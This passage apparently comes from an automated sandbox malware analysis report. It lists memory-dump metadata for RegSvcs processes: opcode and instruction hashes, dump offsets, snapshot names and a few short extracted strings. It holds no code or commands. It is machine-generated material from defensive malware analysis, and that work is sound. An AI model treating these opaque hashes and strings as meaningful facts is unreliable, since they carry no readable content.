                                      • Opcode ID: 075b9ff99c14e3f286b865e2d6ad9e47a081343b2ef475550d1f29aff8764bf0
                                      • Instruction ID: 9a8f47a4be27d7772e8c071916543720117f133f3b2516b1cccf67369bd1bc93
                                      • Opcode Fuzzy Hash: 075b9ff99c14e3f286b865e2d6ad9e47a081343b2ef475550d1f29aff8764bf0
                                      • Instruction Fuzzy Hash: 013110307101169FDB74AF7EA41867E3AA5BF04246F444628F907CE1D5EAB48981CB67
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.2382399863.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_15d0000_RegSvcs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 22b00003791975f977de77357b275853ec8a55181f4ac2b279576b4ea369caa3
                                      • Instruction ID: ba247ec81f0c4178ab5f31fcaf0fc53191cfa59bd449e4d248a67db9e8936723
                                      • Opcode Fuzzy Hash: 22b00003791975f977de77357b275853ec8a55181f4ac2b279576b4ea369caa3
                                      • Instruction Fuzzy Hash: DA213734B405059FD724DFA9C998BAD7BE2BF88B20F248559E902AB3A4CA709C01CB40
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.2340517725.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_141d000_RegSvcs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dc084198304e57b7e7386b6519eb14065b5c08bee5e6a97d86bdae3bda02a569
                                      • Instruction ID: 66273b041f3aa4518bd64c016d01aaeea9fe9615a6aa8bbf961154b0360eda9d
                                      • Opcode Fuzzy Hash: dc084198304e57b7e7386b6519eb14065b5c08bee5e6a97d86bdae3bda02a569
                                      • Instruction Fuzzy Hash: 6521F4B1940204DFDB05DF98D9C4B57BF65FB88314F20C57AE9090A26AC336E456C6A1
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.2340517725.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_141d000_RegSvcs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                      • Instruction ID: 3e0ec7b17e9c39c66c3648ec50437be8d65236ac326ccf4fb92f08bfb44cffd2
                                      • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                      • Instruction Fuzzy Hash: 0D11E4B6844240CFCB06CF54D5C4B56BF71FB84314F24C5AAD9490B66BC336E456CBA1
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.2382399863.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_15d0000_RegSvcs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f939c2cc1ac2699670a0232fa37769e3783ac68ccbc278b034c8734147c03b20
                                      • Instruction ID: c39fbbb376e435a392affeeab89d1ce0e00a08dd197571e04e026f71b88cd539
                                      • Opcode Fuzzy Hash: f939c2cc1ac2699670a0232fa37769e3783ac68ccbc278b034c8734147c03b20
                                      • Instruction Fuzzy Hash: F9E0C2313001005F83549B3EB88485BB7EFEFC812535544B9F10DC7361CD64DC024390
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2787602616.00000000011F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_11f0000_RegSvcs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (aq$Te]q
                                      • API String ID: 0-2961548996
                                      • Opcode ID: bbc3a5c5f8cbda0accb71e5c25a3b600ad65b454e02bbf2630b3e1041b1ef8f6
                                      • Instruction ID: 7b85ff0bb9ddfb3ec1e59274cf03301b518ad142b9b215fc8036db3e0df04044
                                      • Opcode Fuzzy Hash: bbc3a5c5f8cbda0accb71e5c25a3b600ad65b454e02bbf2630b3e1041b1ef8f6
                                      • Instruction Fuzzy Hash: 9251BD34B101149FD708DF69C458AAEBBF2FF88700F2581A9E906DB3A6CB34DC018B81
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2787602616.00000000011F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_11f0000_RegSvcs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Haq$dLcq
                                      • API String ID: 0-1713614415
                                      • Opcode ID: d0d295fcd9fab2c8bdef7bbe7b46dc1b4fe71f12660ffef0bf404144457274b1
                                      • Instruction ID: afff89029215a7b82d4f84f93b487b54a02e2389a014c7c16d4eee20134c5a30
                                      • Opcode Fuzzy Hash: d0d295fcd9fab2c8bdef7bbe7b46dc1b4fe71f12660ffef0bf404144457274b1
                                      • Instruction Fuzzy Hash: EB418B317042148FDB19DF69D494A9EBBF6BF8D300F1485AAE106EB3A6CB749C05CB91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2787602616.00000000011F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_11f0000_RegSvcs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: LR]q
                                      • API String ID: 0-3081347316
                                      • Opcode ID: f4f20b00a0a25893c1268c93f2f644e092f32bb2a643c4b8c112327dec71a63a
                                      • Instruction ID: 73b37d77121dcd0e45dfb55e85595a58b0c75dae467fc8afefdf2b753deb3361
                                      • Opcode Fuzzy Hash: f4f20b00a0a25893c1268c93f2f644e092f32bb2a643c4b8c112327dec71a63a
                                      • Instruction Fuzzy Hash: 6551BE70B00209AFCB08DFB9C5546AEBBF6EF88310F24846DD54ADB395DA34DC428B91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2787602616.00000000011F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_11f0000_RegSvcs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4']q
                                      • API String ID: 0-1259897404
                                      • Opcode ID: 2dac43a2fdf71d37fe7ca94d587153fdec5eac96f84d32c5cac9d803754e5fc0
                                      • Instruction ID: a7a773febda12370ddcaaf922a2d0f72215b46115db861279f1eac208bf640df
                                      • Opcode Fuzzy Hash: 2dac43a2fdf71d37fe7ca94d587153fdec5eac96f84d32c5cac9d803754e5fc0
                                      • Instruction Fuzzy Hash: 6041E330700286AFDB6EAF78D8943AD3FB3BF08204B14557CE556D7196EB308989CB52
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2787602616.00000000011F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_11f0000_RegSvcs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: dLcq
                                      • API String ID: 0-2236789282
                                      • Opcode ID: f62bca72bf3f94504f893d6ec65ede88131da4f0ba1231e35e46ee46240297a6
                                      • Instruction ID: da7b721c67f5978eb4ec5d2b318d7671624aab90268f85d07a3593e9179d6873
                                      • Opcode Fuzzy Hash: f62bca72bf3f94504f893d6ec65ede88131da4f0ba1231e35e46ee46240297a6
                                      • Instruction Fuzzy Hash: DF318D71A002158FDB19DF69C598BADBBF2BF8C300F1485A9E501AB3A2CB759C45CB91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2787602616.00000000011F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_11f0000_RegSvcs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: lqbq
                                      • API String ID: 0-1968102735
                                      • Opcode ID: 255b66e3ff1e464caee041647d8febde18334e5c8c96c44cad4b8c4282c28e85
                                      • Instruction ID: 7f733e4f47c97dd9857720a39b83952ce375e9edb59f41daaeb534753d8c3bcc
                                      • Opcode Fuzzy Hash: 255b66e3ff1e464caee041647d8febde18334e5c8c96c44cad4b8c4282c28e85
                                      • Instruction Fuzzy Hash: CE21CD30601206DFCB1AEF78C51876E7BF6AF89204F2408ACD106EB399DB369D41CB91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2787602616.00000000011F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_11f0000_RegSvcs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: lqbq
                                      • API String ID: 0-1968102735
                                      • Opcode ID: b175df485ae63bece6458197d4094067a30ce088a5aec02f7d21a9a56b89a5d7
                                      • Instruction ID: 68f28721549a33af66016e6933b2b3472b4d3fa0a97f01825f38765ffede9a0d
                                      • Opcode Fuzzy Hash: b175df485ae63bece6458197d4094067a30ce088a5aec02f7d21a9a56b89a5d7
                                      • Instruction Fuzzy Hash: 1B117C30601206DFC719EF78D51876E76E6AF89244F60486CD106EB3A8DF369D41CB95
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2787602616.00000000011F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_11f0000_RegSvcs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Haq
                                      • API String ID: 0-725504367
                                      • Opcode ID: f7afc905be3bb6a611e733128beed561764a48d5d2e1a7fce2f18f862a8ea98c
                                      • Instruction ID: 5af57b668b6647d26da8fe6ce197ac79e800023f8deebf7275c78f09a63feb9e
                                      • Opcode Fuzzy Hash: f7afc905be3bb6a611e733128beed561764a48d5d2e1a7fce2f18f862a8ea98c
                                      • Instruction Fuzzy Hash: EB01A4303082504FC34A9B3D985055E3FA7EFCB25431949EAD149CB3A6CE288C06C396
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2787602616.00000000011F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_11f0000_RegSvcs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cb2f335db7d6b59b7ffd705c80ef9ef9f4558b5758758a0a7de692f11fba906a
                                      • Instruction ID: 0222cb50a5151390dd39e1c631d036e69be3c880ecc48426592d53b34dfbc9d2
                                      • Opcode Fuzzy Hash: cb2f335db7d6b59b7ffd705c80ef9ef9f4558b5758758a0a7de692f11fba906a
                                      • Instruction Fuzzy Hash: FE510638100341AFC71BFF24F444B593B36EB84385390A568D405EB26CEB39ACDADB84
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2787602616.00000000011F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_11f0000_RegSvcs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: eae3ecbcd6857a777ce8a355fdc96a5ad93621b368e4d688f1a9c73ae124f1d3
                                      • Instruction ID: 2483795764db4bc939f6fdb6cd5bc8bdb0a477fe5a62ddd34d39e4afdcc8d8a1
                                      • Opcode Fuzzy Hash: eae3ecbcd6857a777ce8a355fdc96a5ad93621b368e4d688f1a9c73ae124f1d3
                                      • Instruction Fuzzy Hash: 1F314130710242AFDBBDAF79A95837E3AA7AF08245744553CF617C2146EF208999CB62
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2779746727.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_100d000_RegSvcs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 90f1a44b139aaf8ff2829fef9e506dcc786262f537215776365359ba5793dab5
                                      • Instruction ID: 84a067161c422d074e121b2761e593b5cb1aee399bfac94290743bfce98fa2fe
                                      • Opcode Fuzzy Hash: 90f1a44b139aaf8ff2829fef9e506dcc786262f537215776365359ba5793dab5
                                      • Instruction Fuzzy Hash: 67210671504200DFEB06DF98D9C0F5ABFA5FB84314F20C5A9E9490B296C736E456C7B2
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2779746727.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_100d000_RegSvcs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                      • Instruction ID: 54c8bcfa4a4b2619fa086937fb267c2582c4a12edcd3b3c2ac24b92d6f201283
                                      • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                      • Instruction Fuzzy Hash: AE11E172404280CFDB02CF94D5C4B56BFB1FB84314F24C6A9D9490B657C336E45ACBA2
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2787602616.00000000011F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_11f0000_RegSvcs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b02a4baefbd89623cab65ef79cf9c627460e823b3b9b3bdd8417aa050a850bd2
                                      • Instruction ID: 2d24e12871fd56563ffe01afcef381858587cbe34c9d344508432e97e0186cbf
                                      • Opcode Fuzzy Hash: b02a4baefbd89623cab65ef79cf9c627460e823b3b9b3bdd8417aa050a850bd2
                                      • Instruction Fuzzy Hash: B6E0C2313002005F83589B3EB88485BB7EFEFC812531544B9F10DC7355CD64DC028390